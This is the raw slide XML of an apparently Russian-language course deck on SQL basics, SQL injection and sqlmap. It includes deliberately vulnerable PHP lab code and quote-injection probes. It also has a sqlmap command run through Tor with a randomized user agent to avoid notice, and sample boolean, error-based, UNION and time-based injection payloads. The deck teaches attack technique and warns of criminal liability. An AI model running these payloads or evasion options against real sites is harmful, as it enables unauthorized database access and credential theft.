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8" r:id="rId17"/>
    <p:sldId id="27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81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77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Эксплуатация веб-уязвимостей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Основы запросов </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL, SQL injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sqlmap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F4604-165B-34B6-F055-3ACB9A36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Числовой входящий параметр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05557-ACDB-08B1-2C65-5C8AF8E7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286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Для практики нам понадобится скрипт </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>index1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Как я уже говорил выше, подставляем кавычки в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ru-RU" dirty="0"/>
              <a:t>новости.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00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlinj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/index1.php?id=1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Т.к. у нас запрос не имеет фильтрации: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b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>id = $_GET['id’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>	$query = "SELECT * FROM news WHERE id=$id";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Скрипт поймет это как</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT * FROM news WHERE id=1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>И выдаст нам ошибку:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>() expects parameter 1 to be resource, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> given in C:\WebServ\domains\sqlinj\index1.php on line 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0"/>
              <a:t>Если ошибку не выдало — могут быть следующие причины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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>инъекции здесь нет — Фильтруются кавычки, или просто стоит преобразование в (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>int)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Отключен вывод ошибок.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Если все же ошибку вывело — Ура! Мы нашли первый вид </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>инъекции — Числовой входящий параметр.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337526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C6101-8853-7051-F456-2ED43AB7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Строковой входящий параметр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9FE92-51C7-5587-9A0A-3ABF299E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Запросы будем посылать на index2.php. В данном файле, запрос имеет вид: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b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> = $_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>’];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b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> = "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>news</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Тут мы делаем выборку новости по имени пользователя, и опять же — не фильтруем.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Опять посылаем запрос с кавычкой:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlinj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/index2.php?user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AlexanderPHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Выдало ошибку. Ок! Значит уязвимость есть. Для начала нам хватит — приступим к практике.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4AB58C-868C-4D8D-D085-6E03890F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185" y="1825625"/>
            <a:ext cx="6130815" cy="36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09A0724-2F9B-68E3-A703-7529FD71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 dirty="0"/>
              <a:t>SQLMAP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79BB77-D9C3-5028-E11F-9988E3ED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833"/>
            <a:ext cx="10515600" cy="2762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Итак, что такое </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>? Одна из мощнейших открытых утилит для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>пентестера</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, которая автоматизирует процесс поиска и эксплуатации </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL-инъекций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> с целью извлечения данных или захвата удаленного хоста. Что делает </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> отличным от других утилит для обнаружения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL-инъекций</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, так это возможность эксплуатировать каждую найденную уязвимость. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Это означает, что </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> способен не только находить "дырку", но еще и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>заюзать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> ее по полной программе. Любая потенциальная уязвимость дополнительно проверяется на возможность эксплуатации. И все-таки главное — это обнаружение возможности сделать инъекцию </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL-кода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3ECFC7-AB09-12A8-206D-E129770C7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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2025348" y="4095583"/>
            <a:ext cx="8141303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32F55-FFCE-66CE-9588-2AE98C9E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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQLMAP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11423-3BDC-2E16-4A72-27E3F846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Движок для определения SQL-уязвимостей — пускай и самая важная, но все-таки не единственная часть функционала </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. И прежде чем показать работу сканера в действии, не могу хотя бы вкратце, но не рассказать о некоторых его фишках. Итак, в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> реализовано:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Извлечение имен пользователей, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>хешей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> их паролей, а также привилегий и полей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Автоматическое распознавание типа используемого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>хеша</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> и возможность взлома его с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>брутфорса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> по словарю.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Получение списка баз данных, таблиц и столбцов.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Возможность сделать полный или частичный дамп базы данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Продвинутый механизм поиска баз, таблиц или даже столбцов (по всем базам сразу), что может быть полезно для определения таблиц с "интересными" данными вроде имен пользователей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>) или паролей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Загрузка или, наоборот, закачка произвольных файлов на сервер, если уязвимое веб-приложение использует MySQL, MySQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>PostreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> или Microsoft SQL Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Выполнение произвольных команд и получение шелла, если на хосте используется одна из СУБД, перечисленных в предыдущем пункте.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Поддержка прямого подключения к базе данных (без явного использования SQL-уязвимости) с использованием полученных в ходе атаки имени и пароля пользователя для доступа к DMBS, а также IP-адреса, порта и имени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07565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B21A3-46B3-EC5F-F7D3-5D47E4F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пример из моей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F6FDB-45A9-ADAE-986D-630A2050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Условимся, что мы хотим проэксплуатировать уязвимость, которая была найдена в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GET-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>параметре </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ru-RU" dirty="0"/>
              <a:t>веб-страницы, расположенной по </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>адресу </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>http://www.site.com/vuln.php?id=1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>для указания </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>будет ключ -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>u)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Чтобы снизить подозрительную активность, мы будем маскироваться под обычный браузер </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>(ключ --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>random-agent), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>а для подключения использовать защищенный канал </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TOR-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>сети (--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>tor). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Итак, запускаем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sqlmap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b="1" dirty="0"/>
              <a:t>python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/1.0-dev (r4365) — automatic SQL injection and database takeover tool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8669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40BF42-B1B6-C43F-98B5-25267620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1684423"/>
            <a:ext cx="11197389" cy="48607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Сканер определит несколько точек для выполнения инъекций в 17 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP(S)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>запросах. Обрати внимание, что для каждой из них указывается тип, а также </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>пэйлоад</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" u="sng" dirty="0"/>
              <a:t>(В мире вредоносных программ этот термин используется для описания действий на компьютере жертвы, которые должны выполнять вирусы, черви или иной вредоносный код)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Place: GET</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Parameter: id</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-based blind</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Title: AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-based blind — WHERE or HAVING clause</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Payload: id=1 AND 1826=1826</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Type: error-based</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Title: MySQL &gt;= 5.0 AND error-based — WHERE or HAVING clause</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Payload: id=1 AND (SELECT 8532 FROM(SELECT COUNT(),CONCAT(CHAR(58,98,116,120,58), (SELECT (CASE WHEN (8532=8532) THEN 1 ELSE 0 END)),CHAR(58,98,121,102,58),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Type: UNION query</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Title: MySQL UNION query (NULL) — 3 columns</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,98,116,120,58), IFNULL(CAST(CHAR(74,76,73,112,111,113,103,118,80,84) AS CHAR),CHAR(32)),CHAR(58,98,121,102,58))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Type: AND/OR time-based blind</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Title: MySQL &gt; 5.0.11 AND time-based blind</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Payload: id=1 AND SLEEP(10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Помимо этого, сканер выполнит распознавание базы данных, а также других технологий, использованных веб-приложением:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>[02:01:45] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>INFO] the back-end DBMS is MySQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>web application technology: PHP 5.2.6, Apache 2.2.9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>back-end DBMS: MySQL 5.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>В конце концов полученные данные будут записаны в определенный файл:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>[02:01:45] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>INFO] Fetched data logged to text fi les under '/opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/output/www.site.com'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CA5BB8-FEC5-5BDE-3555-BF3454F1E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0" b="7489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497305" y="171952"/>
            <a:ext cx="3866147" cy="13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1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прошли первую инъекцию в большом мире уязвимостей. Она в свое время была одна из самых опаснейших. До сих пор миллионы сайтов спокойно существуют с такой «дырой».</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Но заранее предупреждаю: уголовная ответственность за ваши действия в сфере информации, информационных технологий и защиты информации распространяется отдельно на каждого. Применяйте свои знания во благо.</a:t>
            </a:r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Найти логин и пароль от администратора используя </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>sqlmap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Создавать свои базы данных, таблицы и наполнять их данными можно прямо из этой же программы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ru-RU" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>терминал СУБД), но для выполнения этих операций прежде придётся познакомиться с ещё одним языком программирования — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL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SQL или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Structured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b="1" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(язык структурированных запросов) — язык программирования, предназначенный для управления данными в СУБД. Все современные СУБД поддерживают </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL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*СУБД – Система управления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278B4-A174-C015-AEC4-7B85616A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Язык SQL — это в первую очередь язык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9D55E-B51B-2D00-8D2C-8CE8B9AE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А кроме того он очень похож на естественный язык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Каждый раз, когда требуется прочитать или записать любую информацию в БД, требуется составить корректный запрос. Такой запрос должен быть выражен в терминах </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL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Например, чтобы вывести на экран все записи из таблицы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>города</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, составим такой запрос:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>ПРОЧИТАТЬ всё ИЗ ТАБЛИЦЫ 'города'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Если перевести этот запрос на язык </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, то корректным результатом будет:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
